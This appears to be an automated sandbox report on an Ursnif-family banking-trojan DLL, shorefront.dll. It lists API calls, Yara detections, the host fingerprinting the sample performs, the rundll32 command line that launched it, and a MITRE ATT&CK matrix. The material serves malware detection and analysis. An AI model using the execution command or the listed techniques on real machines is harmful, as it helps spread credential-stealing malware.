Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0050B163 push edx; iretd	0_2_0050B164
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00507F97 push ecx; ret	0_2_00507FA7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C51242B pushad ; ret	0_2_6C51242C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C510DDC push edi; ret	0_2_6C510DE4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C511F8E push esp; ret	0_2_6C511F8F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C546847 push ecx; ret	0_2_6C54685A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C54B375 push ecx; ret	0_2_6C54B388
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0477B67C push ss; retf	3_2_0477B690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04777C20 push ecx; ret	3_2_04777C29
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0477B163 push edx; iretd	3_2_0477B164
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04777F97 push ecx; ret	3_2_04777FA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C51242B pushad ; ret	3_2_6C51242C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C510DDC push edi; ret	3_2_6C510DE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C511F8E push esp; ret	3_2_6C511F8F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C546847 push ecx; ret	3_2_6C54685A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C54B375 push ecx; ret	3_2_6C54B388

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6640, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6604, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3218d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6c500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.538d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.30e8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2228d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.27f8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6c500000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C50FC64 str word ptr [eax+00h]

0_2_6C50FC64

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00504E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		0_2_00504E9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04774E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		3_2_04774E9C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C54DD9B IsDebuggerPresent,

0_2_6C54DD9B

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C55603F ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

0_2_6C55603F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C501F31 LoadLibraryA,GetProcAddress,

0_2_6C501F31

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C55F1E7 mov eax, dword ptr fs:[00000030h]	0_2_6C55F1E7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C55F11D mov eax, dword ptr fs:[00000030h]	0_2_6C55F11D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C55ED24 push dword ptr fs:[00000030h]	0_2_6C55ED24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C55F11D mov eax, dword ptr fs:[00000030h]	3_2_6C55F11D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C55ED24 push dword ptr fs:[00000030h]	3_2_6C55ED24

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C54B524 GetProcessHeap,

0_2_6C54B524

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6C548B1A __call_reportfault,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C548B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6C548B1A __call_reportfault,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		3_2_6C548B1A

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00503946 cpuid

0_2_00503946

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	0_2_6C501566
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_6C54ACFA
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6C556DEC
Source: C:\Windows\System32\loaddll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6C556F16
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_2_6C556FC3
Source: C:\Windows\System32\loaddll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	0_2_6C556843
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_6C554020
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_6C546A76
Source: C:\Windows\System32\loaddll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	0_2_6C553A1E
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_6C553234
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6C54AAC0
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6C556AF7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6C54AAFD
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6C556AB7
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6C556B74
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	0_2_6C556BF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	3_2_6C54ACFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6C556DEC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6C556F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_6C556FC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	3_2_6C556843
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_6C554020
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	3_2_6C546A76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	3_2_6C553A1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_6C553234
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6C54AAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6C556AF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6C54AAFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6C556AB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6C556B74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6C556BF7

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C501979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6C501979

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00503946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_00503946

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6C50146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6C50146C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6640, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6604, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3218d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6c500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.538d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.30e8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2228d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.27f8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6c500000.3.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6640, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6604, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3218d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6c500000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.538d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.30e8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2228d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.27f8d26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6c500000.3.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
